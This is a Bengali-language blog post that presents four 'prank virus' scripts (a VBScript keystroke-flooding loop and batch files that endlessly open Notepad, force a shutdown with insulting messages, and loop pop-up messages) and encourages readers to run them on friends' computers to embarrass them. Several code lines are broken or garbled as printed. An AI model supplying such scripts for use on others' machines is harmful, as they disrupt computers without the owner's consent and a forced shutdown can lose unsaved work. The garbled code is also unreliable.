মাত্র ৩০ সেকেন্ডে ভাইরাস বানান এবং বন্ধু-বান্ধবের সাথে মজা নিন !!!

হ্যালো বন্ধুরা, আগের পোস্টে কথা দিয়েছিলাম আপনাদের জন্য এমন ভাইরাস নিয়ে আসবো যা বেশ মজার । যা আপনাকে কোন আর্থিক ক্ষতির সম্মুখীন করবে না এবং বড় ক্ষতির কারন হবে না । আন্দাজ করতে পারছেন কিছু ?
আন্দাজ করতে পারুন আর নাই পারুন সমস্যা নেই । আমিতো বেত হাতে দাঁড়িয়ে নই যে আন্দাজ করতে না পারলে ধুম-ধাম পিটুনি শুরু করবো 😉
এখন যেই ভাইরাসগুলো দেখাবো সেগুলো বন্ধুর পিসিতে দিয়ে তাকে বেশ বিব্রত করতে পারেন । বন্ধু বেশ জব্দ হবে বলা যায় । ওয়েট ওয়েট, এক মিনিট !
বন্ধুকে জব্দ করার আগে দেখে নিতে হবে না ভাইরাসগুলো কাজ করছে কিনা ? কি ব্যাপার ! আমিই তো বাঁশ দিয়ে দিলাম  এখন । কেননা, ভাই-বেরাদাররাই একে অপরকে বাঁশ দিবে তাইনা ? কিন্তু সেটা যেন কান্নার কারন না হয় । কেননা, কম্পিউটারে কান্না মানে ৫-৬ ডিজিট  এর আর্থিক ক্ষতি । চলুন আর বক বক না করে ভাইরাস বানানোর মিশন শুরু করা যাক ।
                               
                                 

১. এই কোডটা নোটপ্যাডে কপি-পেস্ট করুন এবং ngx.vbs নামে সেভ করুন । এটায় আপনি ডাবল ক্লিক করলেই আপনার কি-বোর্ড হ্যাং হয়ে যাবে । বিশ্বাস হচ্ছে না? প্রয়োগ করেই দেখ বস -
Type :
Set wshShell
= wscript.CreateObject(WScript.Shell)
do
wscript
.sleep 100
wshshell
.sendkeys You are a fool.
loop

২. এই কোড আগের মত নোট প্যাডে লিখুন এবং nix.bat লিখে সেভ করুন । এটায় ডাবল ক্লিক করলে ডেস্কটপে বারবার নোট প্যাড ওপেন হতে থাকবে । 
Type :
@ECHO off
:top
START
%SystemRoot%\system32
otepad
.exe
GOTO top  

৩. নোটপ্যাডে লিখুন এবং nix.bat নামে সেভ করুন । এতে আপনার পিসি আপনাকে মিষ্টি করে বাই বাই বলে বন্ধ হয়ে যাবে । ভয় নেই । চিরতরে পিসি ঘুমুবে না । পাওয়ার বাটনে চাপ দিলেই পিসি জেগে উঠবে এবং আপনাকে এক হাত নিবে কেন আপনি তাকে ঘুম পাড়ানি মাসি পিসি শুনালেন 😆😆😆😆😆😆😆😆😆

wx@echo off
msg
* I dont like you
shutdown
-c Error! You are too stupid! -s

৪. আগেরমত কোড কপি করে nix.bat লিখে সেভ করুন । এটা আপনাকে বারবার মেসেজ দিতে থাকবে । যা বেশ জব্দ করতে পারে যে কাউকে । 

@ECHO off
:Begin
msg
* Hi
msg
* Are you having fun?
msg
* I am!
msg
* Lets have fun together!
msg
* Because you have been o-w-n-e-d
GOTO BEGIN

                                                                            


এই সবগুলো সমস্যার একটাই সমাধান । পিসি রিসার্ট দিন । সব সমস্যার মুশকিল আছান হয়ে যাবে । লেখাটা যদি ভালো লাগে এবং কাউকে জব্দ করার কাজে দেয় তাহলে আমার ইউটিউব চ্যানেল ঘুরে আসুন । 

এখানে ক্লিক করুন ভালো ভালো কন্টেন্ট পেতে এখুনি সাবস্ক্রাইব করে রাখুন প্লিজ । আর বিশেষ চাওয়া থাকলে কমেন্টে জানিয়ে দিবেন চ্যানেলে দিতে না পারলেও ব্লগে পেয়ে যাবেন । হুম, আপনাকে উৎসর্গ করেই পোস্ট করা হবে । 
ধন্যবাদ সবাইকে । শুভরাত্রি । 

No comments

Powered by Blogger.